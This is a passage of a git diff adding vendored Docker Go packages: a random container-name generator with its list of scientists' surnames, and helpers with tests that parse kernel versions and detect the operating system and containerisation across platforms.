Programming" and creator of the TeX typesetting system. https://en.wikipedia.org/wiki/Donald_Knuth + "knuth", + + // Sophie Kowalevski - Russian mathematician responsible for important original contributions to analysis, differential equations and mechanics - https://en.wikipedia.org/wiki/Sofia_Kovalevskaya + "kowalevski", + + // Marie-Jeanne de Lalande - French astronomer, mathematician and cataloguer of stars - https://en.wikipedia.org/wiki/Marie-Jeanne_de_Lalande + "lalande", + + // Hedy Lamarr - Actress and inventor. The principles of her work are now incorporated into modern Wi-Fi, CDMA and Bluetooth technology. https://en.wikipedia.org/wiki/Hedy_Lamarr + "lamarr", + + // Leslie B. Lamport - American computer scientist. Lamport is best known for his seminal work in distributed systems and was the winner of the 2013 Turing Award. https://en.wikipedia.org/wiki/Leslie_Lamport + "lamport", + + // Mary Leakey - British paleoanthropologist who discovered the first fossilized Proconsul skull - https://en.wikipedia.org/wiki/Mary_Leakey + "leakey", + + // Henrietta Swan Leavitt - she was an American astronomer who discovered the relation between the luminosity and the period of Cepheid variable stars. https://en.wikipedia.org/wiki/Henrietta_Swan_Leavitt + "leavitt", + + //Daniel Lewin - Mathematician, Akamai co-founder, soldier, 9/11 victim-- Developed optimization techniques for routing traffic on the internet. Died attempting to stop the 9-11 hijackers. https://en.wikipedia.org/wiki/Daniel_Lewin + "lewin", + + // Ruth Lichterman - one of the original programmers of the ENIAC. https://en.wikipedia.org/wiki/ENIAC - https://en.wikipedia.org/wiki/Ruth_Teitelbaum + "lichterman", + + // Barbara Liskov - co-developed the Liskov substitution principle. Liskov was also the winner of the Turing Prize in 2008. - https://en.wikipedia.org/wiki/Barbara_Liskov + "liskov", + + // Ada Lovelace invented the first algorithm. https://en.wikipedia.org/wiki/Ada_Lovelace (thanks James Turnbull) + "lovelace", + + // Auguste and Louis Lumière - the first filmmakers in history - https://en.wikipedia.org/wiki/Auguste_and_Louis_Lumi%C3%A8re + "lumiere", + + // Mahavira - Ancient Indian mathematician during 9th century AD who discovered basic algebraic identities - https://en.wikipedia.org/wiki/Mah%C4%81v%C4%ABra_(mathematician) + "mahavira", + + // Maria Mayer - American theoretical physicist and Nobel laureate in Physics for proposing the nuclear shell model of the atomic nucleus - https://en.wikipedia.org/wiki/Maria_Mayer + "mayer", + + // John McCarthy invented LISP: https://en.wikipedia.org/wiki/John_McCarthy_(computer_scientist) + "mccarthy", + + // Barbara McClintock - a distinguished American cytogeneticist, 1983 Nobel Laureate in Physiology or Medicine for discovering transposons. https://en.wikipedia.org/wiki/Barbara_McClintock + "mcclintock", + + // Malcolm McLean invented the modern shipping container: https://en.wikipedia.org/wiki/Malcom_McLean + "mclean", + + // Kay McNulty - one of the original programmers of the ENIAC. https://en.wikipedia.org/wiki/ENIAC - https://en.wikipedia.org/wiki/Kathleen_Antonelli + "mcnulty", + + // Lise Meitner - Austrian/Swedish physicist who was involved in the discovery of nuclear fission. The element meitnerium is named after her - https://en.wikipedia.org/wiki/Lise_Meitner + "meitner", + + // Carla Meninsky, was the game designer and programmer for Atari 2600 games Dodge 'Em and Warlords. https://en.wikipedia.org/wiki/Carla_Meninsky + "meninsky", + + // Johanna Mestorf - German prehistoric archaeologist and first female museum director in Germany - https://en.wikipedia.org/wiki/Johanna_Mestorf + "mestorf", + + // Marvin Minsky - Pioneer in Artificial Intelligence, co-founder of the MIT's AI Lab, won the Turing Award in 1969. https://en.wikipedia.org/wiki/Marvin_Minsky + "minsky", + + // Maryam Mirzakhani - an Iranian mathematician and the first woman to win the Fields Medal. https://en.wikipedia.org/wiki/Maryam_Mirzakhani + "mirzakhani", + + // Samuel Morse - contributed to the invention of a single-wire telegraph system based on European telegraphs and was a co-developer of the Morse code - https://en.wikipedia.org/wiki/Samuel_Morse + "morse", + + // Ian Murdock - founder of the Debian project - https://en.wikipedia.org/wiki/Ian_Murdock + "murdock", + + // Isaac Newton invented classic mechanics and modern optics. https://en.wikipedia.org/wiki/Isaac_Newton + "newton", + + // Florence Nightingale, more prominently known as a nurse, was also the first female member of the Royal Statistical Society and a pioneer in statistical graphics https://en.wikipedia.org/wiki/Florence_Nightingale#Statistics_and_sanitary_reform + "nightingale", + + // Alfred Nobel - a Swedish chemist, engineer, innovator, and armaments manufacturer (inventor of dynamite) - https://en.wikipedia.org/wiki/Alfred_Nobel + "nobel", + + // Emmy Noether, German mathematician. Noether's Theorem is named after her. https://en.wikipedia.org/wiki/Emmy_Noether + "noether", + + // Poppy Northcutt. Poppy Northcutt was the first woman to work as part of NASA’s Mission Control. http://www.businessinsider.com/poppy-northcutt-helped-apollo-astronauts-2014-12?op=1 + "northcutt", + + // Robert Noyce invented silicone integrated circuits and gave Silicon Valley its name. - https://en.wikipedia.org/wiki/Robert_Noyce + "noyce", + + // Panini - Ancient Indian linguist and grammarian from 4th century CE who worked on the world's first formal system - https://en.wikipedia.org/wiki/P%C4%81%E1%B9%87ini#Comparison_with_modern_formal_systems + "panini", + + // Ambroise Pare invented modern surgery. https://en.wikipedia.org/wiki/Ambroise_Par%C3%A9 + "pare", + + // Louis Pasteur discovered vaccination, fermentation and pasteurization. https://en.wikipedia.org/wiki/Louis_Pasteur. + "pasteur", + + // Cecilia Payne-Gaposchkin was an astronomer and astrophysicist who, in 1925, proposed in her Ph.D. thesis an explanation for the composition of stars in terms of the relative abundances of hydrogen and helium. https://en.wikipedia.org/wiki/Cecilia_Payne-Gaposchkin + "payne", + + // Radia Perlman is a software designer and network engineer and most famous for her invention of the spanning-tree protocol (STP). https://en.wikipedia.org/wiki/Radia_Perlman + "perlman", + + // Rob Pike was a key contributor to Unix, Plan 9, the X graphic system, utf-8, and the Go programming language. https://en.wikipedia.org/wiki/Rob_Pike + "pike", + + // Henri Poincaré made fundamental contributions in several fields of mathematics. https://en.wikipedia.org/wiki/Henri_Poincar%C3%A9 + "poincare", + + // Laura Poitras is a director and producer whose work, made possible by open source crypto tools, advances the causes of truth and freedom of information by reporting disclosures by whistleblowers such as Edward Snowden. https://en.wikipedia.org/wiki/Laura_Poitras + "poitras", + + // Claudius Ptolemy - a Greco-Egyptian writer of Alexandria, known as a mathematician, astronomer, geographer, astrologer, and poet of a single epigram in the Greek Anthology - https://en.wikipedia.org/wiki/Ptolemy + "ptolemy", + + // C. V. Raman - Indian physicist who won the Nobel Prize in 1930 for proposing the Raman effect. - https://en.wikipedia.org/wiki/C._V._Raman + "raman", + + // Srinivasa Ramanujan - Indian mathematician and autodidact who made extraordinary contributions to mathematical analysis, number theory, infinite series, and continued fractions. - https://en.wikipedia.org/wiki/Srinivasa_Ramanujan + "ramanujan", + + // Sally Kristen Ride was an American physicist and astronaut. She was the first American woman in space, and the youngest American astronaut. https://en.wikipedia.org/wiki/Sally_Ride + "ride", + + // Rita Levi-Montalcini - Won Nobel Prize in Physiology or Medicine jointly with colleague Stanley Cohen for the discovery of nerve growth factor (https://en.wikipedia.org/wiki/Rita_Levi-Montalcini) + "montalcini", + + // Dennis Ritchie - co-creator of UNIX and the C programming language. - https://en.wikipedia.org/wiki/Dennis_Ritchie + "ritchie", + + // Wilhelm Conrad Röntgen - German physicist who was awarded the first Nobel Prize in Physics in 1901 for the discovery of X-rays (Röntgen rays). https://en.wikipedia.org/wiki/Wilhelm_R%C3%B6ntgen + "roentgen", + + // Rosalind Franklin - British biophysicist and X-ray crystallographer whose research was critical to the understanding of DNA - https://en.wikipedia.org/wiki/Rosalind_Franklin + "rosalind", + + // Meghnad Saha - Indian astrophysicist best known for his development of the Saha equation, used to describe chemical and physical conditions in stars - https://en.wikipedia.org/wiki/Meghnad_Saha + "saha", + + // Jean E. Sammet developed FORMAC, the first widely used computer language for symbolic manipulation of mathematical formulas. https://en.wikipedia.org/wiki/Jean_E._Sammet + "sammet", + + // Carol Shaw - Originally an Atari employee, Carol Shaw is said to be the first female video game designer. https://en.wikipedia.org/wiki/Carol_Shaw_(video_game_designer) + "shaw", + + // Dame Stephanie "Steve" Shirley - Founded a software company in 1962 employing women working from home. https://en.wikipedia.org/wiki/Steve_Shirley + "shirley", + + // William Shockley co-invented the transistor - https://en.wikipedia.org/wiki/William_Shockley + "shockley", + + // Françoise Barré-Sinoussi - French virologist and Nobel Prize Laureate in Physiology or Medicine; her work was fundamental in identifying HIV as the cause of AIDS. https://en.wikipedia.org/wiki/Fran%C3%A7oise_Barr%C3%A9-Sinoussi + "sinoussi", + + // Betty Snyder - one of the original programmers of the ENIAC. https://en.wikipedia.org/wiki/ENIAC - https://en.wikipedia.org/wiki/Betty_Holberton + "snyder", + + // Frances Spence - one of the original programmers of the ENIAC. https://en.wikipedia.org/wiki/ENIAC - https://en.wikipedia.org/wiki/Frances_Spence + "spence", + + // Richard Matthew Stallman - the founder of the Free Software movement, the GNU project, the Free Software Foundation, and the League for Programming Freedom. He also invented the concept of copyleft to protect the ideals of this movement, and enshrined this concept in the widely-used GPL (General Public License) for software. https://en.wikiquote.org/wiki/Richard_Stallman + "stallman", + + // Michael Stonebraker is a database research pioneer and architect of Ingres, Postgres, VoltDB and SciDB. Winner of 2014 ACM Turing Award. https://en.wikipedia.org/wiki/Michael_Stonebraker + "stonebraker", + + // Janese Swanson (with others) developed the first of the Carmen Sandiego games. She went on to found Girl Tech. https://en.wikipedia.org/wiki/Janese_Swanson + "swanson", + + // Aaron Swartz was influential in creating RSS, Markdown, Creative Commons, Reddit, and much of the internet as we know it today. He was devoted to freedom of information on the web. https://en.wikiquote.org/wiki/Aaron_Swartz + "swartz", + + // Bertha Swirles was a theoretical physicist who made a number of contributions to early quantum theory. https://en.wikipedia.org/wiki/Bertha_Swirles + "swirles", + + // Nikola Tesla invented the AC electric system and every gadget ever used by a James Bond villain. https://en.wikipedia.org/wiki/Nikola_Tesla + "tesla", + + // Ken Thompson - co-creator of UNIX and the C programming language - https://en.wikipedia.org/wiki/Ken_Thompson + "thompson", + + // Linus Torvalds invented Linux and Git. https://en.wikipedia.org/wiki/Linus_Torvalds + "torvalds", + + // Alan Turing was a founding father of computer science. https://en.wikipedia.org/wiki/Alan_Turing. + "turing", + + // Varahamihira - Ancient Indian mathematician who discovered trigonometric formulae during 505-587 CE - https://en.wikipedia.org/wiki/Var%C4%81hamihira#Contributions + "varahamihira", + + // Sir Mokshagundam Visvesvaraya - is a notable Indian engineer. He is a recipient of the Indian Republic's highest honour, the Bharat Ratna, in 1955. On his birthday, 15 September is celebrated as Engineer's Day in India in his memory - https://en.wikipedia.org/wiki/Visvesvaraya + "visvesvaraya", + + // Christiane Nüsslein-Volhard - German biologist, won Nobel Prize in Physiology or Medicine in 1995 for research on the genetic control of embryonic development. https://en.wikipedia.org/wiki/Christiane_N%C3%BCsslein-Volhard + "volhard", + + // Marlyn Wescoff - one of the original programmers of the ENIAC. https://en.wikipedia.org/wiki/ENIAC - https://en.wikipedia.org/wiki/Marlyn_Meltzer + "wescoff", + + // Andrew Wiles - Notable British mathematician who proved the enigmatic Fermat's Last Theorem - https://en.wikipedia.org/wiki/Andrew_Wiles + "wiles", + + // Roberta Williams, did pioneering work in graphical adventure games for personal computers, particularly the King's Quest series. https://en.wikipedia.org/wiki/Roberta_Williams + "williams", + + // Sophie Wilson designed the first Acorn Micro-Computer and the instruction set for ARM processors. https://en.wikipedia.org/wiki/Sophie_Wilson + "wilson", + + // Jeannette Wing - co-developed the Liskov substitution principle. - https://en.wikipedia.org/wiki/Jeannette_Wing + "wing", + + // Steve Wozniak invented the Apple I and Apple II. https://en.wikipedia.org/wiki/Steve_Wozniak + "wozniak", + + // The Wright brothers, Orville and Wilbur - credited with inventing and building the world's first successful airplane and making the first controlled, powered and sustained heavier-than-air human flight - https://en.wikipedia.org/wiki/Wright_brothers + "wright", + + // Rosalyn Sussman Yalow - Rosalyn Sussman Yalow was an American medical physicist, and a co-winner of the 1977 Nobel Prize in Physiology or Medicine for development of the radioimmunoassay technique. https://en.wikipedia.org/wiki/Rosalyn_Sussman_Yalow + "yalow", + + // Ada Yonath - an Israeli crystallographer, the first woman from the Middle East to win a Nobel prize in the sciences. https://en.wikipedia.org/wiki/Ada_Yonath + "yonath", + } +) + +// GetRandomName generates a random name from the list of adjectives and surnames in this package +// formatted as "adjective_surname". For example 'focused_turing'. If retry is non-zero, a random +// integer between 0 and 10 will be added to the end of the name, e.g `focused_turing3` +func GetRandomName(retry int) string { + rnd := random.Rand +begin: + name := fmt.Sprintf("%s_%s", left[rnd.Intn(len(left))], right[rnd.Intn(len(right))]) + if name == "boring_wozniak" /* Steve Wozniak is not boring */ { + goto begin + } + + if retry > 0 { + name = fmt.Sprintf("%s%d", name, rnd.Intn(10)) + } + return name +} diff --git a/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator_test.go b/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator_test.go new file mode 100644 index 0000000000..d1a94977d7 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator_test.go @@ -0,0 +1,27 @@ +package namesgenerator + +import ( + "strings" + "testing" +) + +func TestNameFormat(t *testing.T) { + name := GetRandomName(0) + if !strings.Contains(name, "_") { + t.Fatalf("Generated name does not contain an underscore") + } + if strings.ContainsAny(name, "0123456789") { + t.Fatalf("Generated name contains numbers!") + } +} + +func TestNameRetries(t *testing.T) { + name := GetRandomName(1) + if !strings.Contains(name, "_") { + t.Fatalf("Generated name does not contain an underscore") + } + if !strings.ContainsAny(name, "0123456789") { + t.Fatalf("Generated name doesn't contain a number") + } + +} diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel.go new file mode 100644 index 0000000000..7738fc7411 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel.go @@ -0,0 +1,74 @@ +// +build !windows + +// Package kernel provides helper function to get, parse and compare kernel +// versions for different platforms. +package kernel + +import ( + "errors" + "fmt" +) + +// VersionInfo holds information about the kernel. +type VersionInfo struct { + Kernel int // Version of the kernel (e.g. 4.1.2-generic -> 4) + Major int // Major part of the kernel version (e.g. 4.1.2-generic -> 1) + Minor int // Minor part of the kernel version (e.g. 4.1.2-generic -> 2) + Flavor string // Flavor of the kernel version (e.g. 4.1.2-generic -> generic) +} + +func (k *VersionInfo) String() string { + return fmt.Sprintf("%d.%d.%d%s", k.Kernel, k.Major, k.Minor, k.Flavor) +} + +// CompareKernelVersion compares two kernel.VersionInfo structs. +// Returns -1 if a < b, 0 if a == b, 1 it a > b +func CompareKernelVersion(a, b VersionInfo) int { + if a.Kernel < b.Kernel { + return -1 + } else if a.Kernel > b.Kernel { + return 1 + } + + if a.Major < b.Major { + return -1 + } else if a.Major > b.Major { + return 1 + } + + if a.Minor < b.Minor { + return -1 + } else if a.Minor > b.Minor { + return 1 + } + + return 0 +} + +// ParseRelease parses a string and creates a VersionInfo based on it. +func ParseRelease(release string) (*VersionInfo, error) { + var ( + kernel, major, minor, parsed int + flavor, partial string + ) + + // Ignore error from Sscanf to allow an empty flavor. Instead, just + // make sure we got all the version numbers. + parsed, _ = fmt.Sscanf(release, "%d.%d%s", &kernel, &major, &partial) + if parsed < 2 { + return nil, errors.New("Can't parse kernel version " + release) + } + + // sometimes we have 3.12.25-gentoo, but sometimes we just have 3.12-1-amd64 + parsed, _ = fmt.Sscanf(partial, ".%d%s", &minor, &flavor) + if parsed < 1 { + flavor = partial + } + + return &VersionInfo{ + Kernel: kernel, + Major: major, + Minor: minor, + Flavor: flavor, + }, nil +} diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_darwin.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_darwin.go new file mode 100644 index 0000000000..71f205b285 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_darwin.go @@ -0,0 +1,56 @@ +// +build darwin + +// Package kernel provides helper function to get, parse and compare kernel +// versions for different platforms. +package kernel + +import ( + "fmt" + "os/exec" + "strings" + + "github.com/mattn/go-shellwords" +) + +// GetKernelVersion gets the current kernel version. +func GetKernelVersion() (*VersionInfo, error) { + release, err := getRelease() + if err != nil { + return nil, err + } + + return ParseRelease(release) +} + +// getRelease uses `system_profiler SPSoftwareDataType` to get OSX kernel version +func getRelease() (string, error) { + cmd := exec.Command("system_profiler", "SPSoftwareDataType") + osName, err := cmd.Output() + if err != nil { + return "", err + } + + var release string + data := strings.Split(string(osName), "\n") + for _, line := range data { + if strings.Contains(line, "Kernel Version") { + // It has the format like ' Kernel Version: Darwin 14.5.0' + content := strings.SplitN(line, ":", 2) + if len(content) != 2 { + return "", fmt.Errorf("Kernel Version is invalid") + } + + prettyNames, err := shellwords.Parse(content[1]) + if err != nil { + return "", fmt.Errorf("Kernel Version is invalid: %s", err.Error()) + } + + if len(prettyNames) != 2 { + return "", fmt.Errorf("Kernel Version needs to be 'Darwin x.x.x' ") + } + release = prettyNames[1] + } + } + + return release, nil +} diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix.go new file mode 100644 index 0000000000..744d5e1f83 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix.go @@ -0,0 +1,45 @@ +// +build linux freebsd solaris + +// Package kernel provides helper function to get, parse and compare kernel +// versions for different platforms. +package kernel + +import ( + "bytes" + + "github.com/Sirupsen/logrus" +) + +// GetKernelVersion gets the current kernel version. +func GetKernelVersion() (*VersionInfo, error) { + uts, err := uname() + if err != nil { + return nil, err + } + + release := make([]byte, len(uts.Release)) + + i := 0 + for _, c := range uts.Release { + release[i] = byte(c) + i++ + } + + // Remove the \x00 from the release for Atoi to parse correctly + release = release[:bytes.IndexByte(release, 0)] + + return ParseRelease(string(release)) +} + +// CheckKernelVersion checks if current kernel is newer than (or equal to) +// the given version. +func CheckKernelVersion(k, major, minor int) bool { + if v, err := GetKernelVersion(); err != nil { + logrus.Warnf("error getting kernel version: %s", err) + } else { + if CompareKernelVersion(*v, VersionInfo{Kernel: k, Major: major, Minor: minor}) < 0 { + return false + } + } + return true +} diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix_test.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix_test.go new file mode 100644 index 0000000000..dc8c0e307b --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix_test.go @@ -0,0 +1,96 @@ +// +build !windows + +package kernel + +import ( + "fmt" + "testing" +) + +func assertParseRelease(t *testing.T, release string, b *VersionInfo, result int) { + var ( + a *VersionInfo + ) + a, _ = ParseRelease(release) + + if r := CompareKernelVersion(*a, *b); r != result { + t.Fatalf("Unexpected kernel version comparison result for (%v,%v). Found %d, expected %d", release, b, r, result) + } + if a.Flavor != b.Flavor { + t.Fatalf("Unexpected parsed kernel flavor. Found %s, expected %s", a.Flavor, b.Flavor) + } +} + +// TestParseRelease tests the ParseRelease() function +func TestParseRelease(t *testing.T) { + assertParseRelease(t, "3.8.0", &VersionInfo{Kernel: 3, Major: 8, Minor: 0}, 0) + assertParseRelease(t, "3.4.54.longterm-1", &VersionInfo{Kernel: 3, Major: 4, Minor: 54, Flavor: ".longterm-1"}, 0) + assertParseRelease(t, "3.4.54.longterm-1", &VersionInfo{Kernel: 3, Major: 4, Minor: 54, Flavor: ".longterm-1"}, 0) + assertParseRelease(t, "3.8.0-19-generic", &VersionInfo{Kernel: 3, Major: 8, Minor: 0, Flavor: "-19-generic"}, 0) + assertParseRelease(t, "3.12.8tag", &VersionInfo{Kernel: 3, Major: 12, Minor: 8, Flavor: "tag"}, 0) + assertParseRelease(t, "3.12-1-amd64", &VersionInfo{Kernel: 3, Major: 12, Minor: 0, Flavor: "-1-amd64"}, 0) + assertParseRelease(t, "3.8.0", &VersionInfo{Kernel: 4, Major: 8, Minor: 0}, -1) + // Errors + invalids := []string{ + "3", + "a", + "a.a", + "a.a.a-a", + } + for _, invalid := range invalids { + expectedMessage := fmt.Sprintf("Can't parse kernel version %v", invalid) + if _, err := ParseRelease(invalid); err == nil || err.Error() != expectedMessage { + + } + } +} + +func assertKernelVersion(t *testing.T, a, b VersionInfo, result int) { + if r := CompareKernelVersion(a, b); r != result { + t.Fatalf("Unexpected kernel version comparison result. Found %d, expected %d", r, result) + } +} + +// TestCompareKernelVersion tests the CompareKernelVersion() function +func TestCompareKernelVersion(t *testing.T) { + assertKernelVersion(t, + VersionInfo{Kernel: 3, Major: 8, Minor: 0}, + VersionInfo{Kernel: 3, Major: 8, Minor: 0}, + 0) + assertKernelVersion(t, + VersionInfo{Kernel: 2, Major: 6, Minor: 0}, + VersionInfo{Kernel: 3, Major: 8, Minor: 0}, + -1) + assertKernelVersion(t, + VersionInfo{Kernel: 3, Major: 8, Minor: 0}, + VersionInfo{Kernel: 2, Major: 6, Minor: 0}, + 1) + assertKernelVersion(t, + VersionInfo{Kernel: 3, Major: 8, Minor: 0}, + VersionInfo{Kernel: 3, Major: 8, Minor: 0}, + 0) + assertKernelVersion(t, + VersionInfo{Kernel: 3, Major: 8, Minor: 5}, + VersionInfo{Kernel: 3, Major: 8, Minor: 0}, + 1) + assertKernelVersion(t, + VersionInfo{Kernel: 3, Major: 0, Minor: 20}, + VersionInfo{Kernel: 3, Major: 8, Minor: 0}, + -1) + assertKernelVersion(t, + VersionInfo{Kernel: 3, Major: 7, Minor: 20}, + VersionInfo{Kernel: 3, Major: 8, Minor: 0}, + -1) + assertKernelVersion(t, + VersionInfo{Kernel: 3, Major: 8, Minor: 20}, + VersionInfo{Kernel: 3, Major: 7, Minor: 0}, + 1) + assertKernelVersion(t, + VersionInfo{Kernel: 3, Major: 8, Minor: 20}, + VersionInfo{Kernel: 3, Major: 8, Minor: 0}, + 1) + assertKernelVersion(t, + VersionInfo{Kernel: 3, Major: 8, Minor: 0}, + VersionInfo{Kernel: 3, Major: 8, Minor: 20}, + -1) +} diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_windows.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_windows.go new file mode 100644 index 0000000000..80fab8ff64 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_windows.go @@ -0,0 +1,69 @@ +// +build windows + +package kernel + +import ( + "fmt" + "syscall" + "unsafe" +) + +// VersionInfo holds information about the kernel. +type VersionInfo struct { + kvi string // Version of the kernel (e.g. 6.1.7601.17592 -> 6) + major int // Major part of the kernel version (e.g. 6.1.7601.17592 -> 1) + minor int // Minor part of the kernel version (e.g. 6.1.7601.17592 -> 7601) + build int // Build number of the kernel version (e.g. 6.1.7601.17592 -> 17592) +} + +func (k *VersionInfo) String() string { + return fmt.Sprintf("%d.%d %d (%s)", k.major, k.minor, k.build, k.kvi) +} + +// GetKernelVersion gets the current kernel version. +func GetKernelVersion() (*VersionInfo, error) { + + var ( + h syscall.Handle + dwVersion uint32 + err error + ) + + KVI := &VersionInfo{"Unknown", 0, 0, 0} + + if err = syscall.RegOpenKeyEx(syscall.HKEY_LOCAL_MACHINE, + syscall.StringToUTF16Ptr(`SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\`), + 0, + syscall.KEY_READ, + &h); err != nil { + return KVI, err + } + defer syscall.RegCloseKey(h) + + var buf [1 << 10]uint16 + var typ uint32 + n := uint32(len(buf) * 2) // api expects array of bytes, not uint16 + + if err = syscall.RegQueryValueEx(h, + syscall.StringToUTF16Ptr("BuildLabEx"), + nil, + &typ, + (*byte)(unsafe.Pointer(&buf[0])), + &n); err != nil { + return KVI, err + } + + KVI.kvi = syscall.UTF16ToString(buf[:]) + + // Important - docker.exe MUST be manifested for this API to return + // the correct information. + if dwVersion, err = syscall.GetVersion(); err != nil { + return KVI, err + } + + KVI.major = int(dwVersion & 0xFF) + KVI.minor = int((dwVersion & 0XFF00) >> 8) + KVI.build = int((dwVersion & 0xFFFF0000) >> 16) + + return KVI, nil +} diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_linux.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_linux.go new file mode 100644 index 0000000000..bb9b32641e --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_linux.go @@ -0,0 +1,19 @@ +package kernel + +import ( + "syscall" +) + +// Utsname represents the system name structure. +// It is passthrough for syscall.Utsname in order to make it portable with +// other platforms where it is not available. +type Utsname syscall.Utsname + +func uname() (*syscall.Utsname, error) { + uts := &syscall.Utsname{} + + if err := syscall.Uname(uts); err != nil { + return nil, err + } + return uts, nil +} diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_solaris.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_solaris.go new file mode 100644 index 0000000000..49370bd3dd --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_solaris.go @@ -0,0 +1,14 @@ +package kernel + +import ( + "golang.org/x/sys/unix" +) + +func uname() (*unix.Utsname, error) { + uts := &unix.Utsname{} + + if err := unix.Uname(uts); err != nil { + return nil, err + } + return uts, nil +} diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_unsupported.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_unsupported.go new file mode 100644 index 0000000000..1da3f239fa --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_unsupported.go @@ -0,0 +1,18 @@ +// +build !linux,!solaris + +package kernel + +import ( + "errors" +) + +// Utsname represents the system name structure. +// It is defined here to make it portable as it is available on linux but not +// on windows. +type Utsname struct { + Release [65]byte +} + +func uname() (*Utsname, error) { + return nil, errors.New("Kernel version detection is available only on linux") +} diff --git a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_linux.go b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_linux.go new file mode 100644 index 0000000000..e04a3499af --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_linux.go @@ -0,0 +1,77 @@ +// Package operatingsystem provides helper function to get the operating system +// name for different platforms. +package operatingsystem + +import ( + "bufio" + "bytes" + "fmt" + "io/ioutil" + "os" + "strings" + + "github.com/mattn/go-shellwords" +) + +var ( + // file to use to detect if the daemon is running in a container + proc1Cgroup = "/proc/1/cgroup" + + // file to check to determine Operating System + etcOsRelease = "/etc/os-release" + + // used by stateless systems like Clear Linux + altOsRelease = "/usr/lib/os-release" +) + +// GetOperatingSystem gets the name of the current operating system. +func GetOperatingSystem() (string, error) { + osReleaseFile, err := os.Open(etcOsRelease) + if err != nil { + if !os.IsNotExist(err) { + return "", fmt.Errorf("Error opening %s: %v", etcOsRelease, err) + } + osReleaseFile, err = os.Open(altOsRelease) + if err != nil { + return "", fmt.Errorf("Error opening %s: %v", altOsRelease, err) + } + } + defer osReleaseFile.Close() + + var prettyName string + scanner := bufio.NewScanner(osReleaseFile) + for scanner.Scan() { + line := scanner.Text() + if strings.HasPrefix(line, "PRETTY_NAME=") { + data := strings.SplitN(line, "=", 2) + prettyNames, err := shellwords.Parse(data[1]) + if err != nil { + return "", fmt.Errorf("PRETTY_NAME is invalid: %s", err.Error()) + } + if len(prettyNames) != 1 { + return "", fmt.Errorf("PRETTY_NAME needs to be enclosed by quotes if they have spaces: %s", data[1]) + } + prettyName = prettyNames[0] + } + } + if prettyName != "" { + return prettyName, nil + } + // If not set, defaults to PRETTY_NAME="Linux" + // c.f. http://www.freedesktop.org/software/systemd/man/os-release.html + return "Linux", nil +} + +// IsContainerized returns true if we are running inside a container. +func IsContainerized() (bool, error) { + b, err := ioutil.ReadFile(proc1Cgroup) + if err != nil { + return false, err + } + for _, line := range bytes.Split(b, []byte{'\n'}) { + if len(line) > 0 && !bytes.HasSuffix(line, []byte{'/'}) && !bytes.HasSuffix(line, []byte("init.scope")) { + return true, nil + } + } + return false, nil +} diff --git a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_solaris.go b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_solaris.go new file mode 100644 index 0000000000..d08ad14860 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_solaris.go @@ -0,0 +1,37 @@ +// +build solaris,cgo + +package operatingsystem + +/* +#include +*/ +import "C" + +import ( + "bytes" + "errors" + "io/ioutil" +) + +var etcOsRelease = "/etc/release" + +// GetOperatingSystem gets the name of the current operating system. +func GetOperatingSystem() (string, error) { + b, err := ioutil.ReadFile(etcOsRelease) + if err != nil { + return "", err + } + if i := bytes.Index(b, []byte("\n")); i >= 0 { + b = bytes.Trim(b[:i], " ") + return string(b), nil + } + return "", errors.New("release not found") +} + +// IsContainerized returns true if we are running inside a container. +func IsContainerized() (bool, error) { + if C.getzoneid() != 0 { + return true, nil + } + return false, nil +} diff --git a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix.go b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix.go new file mode 100644 index 0000000000..bc91c3c533 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix.go @@ -0,0 +1,25 @@ +// +build freebsd darwin + +package operatingsystem + +import ( + "errors" + "os/exec" +) + +// GetOperatingSystem gets the name of the current operating system. +func GetOperatingSystem() (string, error) { + cmd := exec.Command("uname", "-s") + osName, err := cmd.Output() + if err != nil { + return "", err + } + return string(osName), nil +} + +// IsContainerized returns true if we are running inside a container. +// No-op on FreeBSD and Darwin, always returns false. +func IsContainerized() (bool, error) { + // TODO: Implement jail detection for freeBSD + return false, errors.New("Cannot detect if we are in container") +} diff --git a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix_test.go b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix_test.go new file mode 100644 index 0000000000..e7120c65c4 